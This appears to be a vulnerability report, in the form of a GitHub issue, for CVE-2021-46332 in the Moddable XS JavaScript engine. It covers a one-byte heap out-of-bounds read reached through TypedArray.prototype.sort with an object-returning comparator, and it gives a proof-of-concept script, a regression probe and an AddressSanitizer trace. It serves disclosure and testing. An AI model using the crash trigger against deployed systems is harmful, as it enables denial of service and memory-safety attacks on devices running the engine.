CVE-2021-46332: Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter · Issue #752 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow (an out-of-bounds read of one byte) in fxUint8Getter, xs/sources/xsDataView.c, reachable from JavaScript through TypedArray.prototype.sort with a user-supplied comparator.


Moddable-XS revision

Commit: db8f973

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

cd ~/moddable/xs/makefiles/lin
# (debug)
make -f xst.mk

The trace below was produced by an AddressSanitizer-instrumented debug build (libasan.so.4 is interposed on malloc); the build line as given does not show the sanitizer flags that were used.

Test case

```js
var buf = new ArrayBuffer(65552);
var numbers = new Uint8Array(buf);
function v() { return 7; }
// The comparator returns an object rather than a number; the sort converts it
// with valueOf(), so JavaScript runs again from inside the native sort loop.
function JSEtest(a, b) { return { valueOf: v }; }
numbers.sort(JSEtest);
```
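The comparator in the test case never returns a number: it returns an object, and converting that result to a number calls valueOf(), so user JavaScript runs inside fx_TypedArray_prototype_sort between element reads (the trace further down shows fxCompareTypedArrayItem calling fxUint8Getter). The following Node.js probe is an added example, not part of the issue or of the Moddable code base: runOriginalPattern reproduces the exact shape of the PoC so the same script can be run under node and under xst for comparison, and runSortProbe generalises it with a comparator whose valueOf() also mutates the array being sorted. All function names are the editor's own and the input bytes are constructed.

```javascript
// Added regression probe for re-entrant TypedArray.prototype.sort comparators
// (not from the issue or the Moddable project; names are the editor's own).

// Exact shape of the PoC: every comparison yields an object whose valueOf()
// returns the constant 7. Returns the array length for cross-engine comparison.
function runOriginalPattern() {
  const buf = new ArrayBuffer(65552);
  const numbers = new Uint8Array(buf);
  function v() { return 7; }
  function JSEtest(a, b) { return { valueOf: v }; }
  numbers.sort(JSEtest);
  return numbers.length;
}

// Generalisation: the comparator result is still an object, but its valueOf()
// additionally runs a caller-supplied side effect against the array under sort
// before returning a consistent ordering (a - b).
function makeReentrantComparator(target, onReenter) {
  let calls = 0;
  return function cmp(a, b) {
    return {
      valueOf() {
        calls += 1;
        onReenter(target, calls); // arbitrary JavaScript mid-sort
        return a - b;
      },
    };
  };
}

// Sorts a constructed Uint8Array of `length` distinct-as-possible bytes with
// the re-entrant comparator and reports the invariants a memory-safe engine
// must keep: the view and buffer sizes are unchanged and, when the side effect
// does not touch the array, the result is sorted.
function runSortProbe(length, onReenter) {
  const buf = new ArrayBuffer(length);
  const arr = new Uint8Array(buf);
  for (let i = 0; i < length; i++) arr[i] = (length - i) & 0xff; // constructed input
  let reenters = 0;
  const cmp = makeReentrantComparator(arr, (t, n) => {
    reenters = n;
    onReenter(t, n);
  });
  arr.sort(cmp);
  let sorted = true;
  for (let i = 1; i < arr.length; i++) {
    if (arr[i - 1] > arr[i]) { sorted = false; break; }
  }
  return { length: arr.length, byteLength: buf.byteLength, sorted, reenters };
}

// Side effect for the probe: overwrite the whole array from inside the
// comparator, the kind of mid-sort mutation a sort implementation must tolerate.
function clobber(target) {
  target.fill(0xff);
}
```

Under a conforming engine both runSortProbe variants complete with the original length and byteLength, and the counter shows that valueOf() fired on every comparison; the number of re-entries is therefore at least length - 1 for distinct input. Running the same file under xst gives the differential check: the PoC shape should complete rather than fault.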

Execution & Output

$ ./xst poc.js

```
=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f86d2bfe7ff at pc 0x5558b4ed93a4 bp 0x7fffebd25aa0 sp 0x7fffebd25a90
READ of size 1 at 0x7f86d2bfe7ff thread T0
    #0 0x5558b4ed93a3 in fxUint8Getter /root/moddable/xs/sources/xsDataView.c:2883
    #1 0x5558b4e8afbb in fxCompareTypedArrayItem /root/moddable/xs/sources/xsDataView.c:1234
    #2 0x5558b4e8e7d9 in fx_TypedArray_prototype_sort /root/moddable/xs/sources/xsDataView.c:2303
    #3 0x5558b516fa1d in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #4 0x5558b51d642c in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #5 0x5558b53e48d1 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #6 0x5558b4d1c05e in main /root/moddable/xs/tools/xst.c:281
    #7 0x7f86d6cd0bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #8 0x5558b4d1d789 in _start (/root/moddable/build/bin/lin/debug/xst+0x93789)

0x7f86d2bfe7ff is located 1 bytes to the left of 16777248-byte region [0x7f86d2bfe800,0x7f86d3bfe820)
allocated by thread T0 here:
    #0 0x7f86d773bb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x5558b50510cd in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/moddable/xs/sources/xsDataView.c:2883 in fxUint8Getter
Shadow bytes around the buggy address:
  0x0ff15a577ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0ff15a577cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
  0x0ff15a577d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
=======ABORTING
```

The faulting read is one byte before the start of a 16777248-byte region allocated by fxGrowChunks, i.e. just below the XS chunk heap that backs the typed array's storage, and it happens inside the comparison step of the sort.

Credits: Found by OWL337 team.
